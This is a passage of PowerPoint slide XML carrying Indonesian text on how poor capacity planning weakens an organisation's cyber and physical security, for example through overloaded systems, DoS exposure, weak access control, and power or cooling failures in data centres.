            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Buruk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> denial of service (DoS). Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penurunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengabaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinvestasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengabaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendinginan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
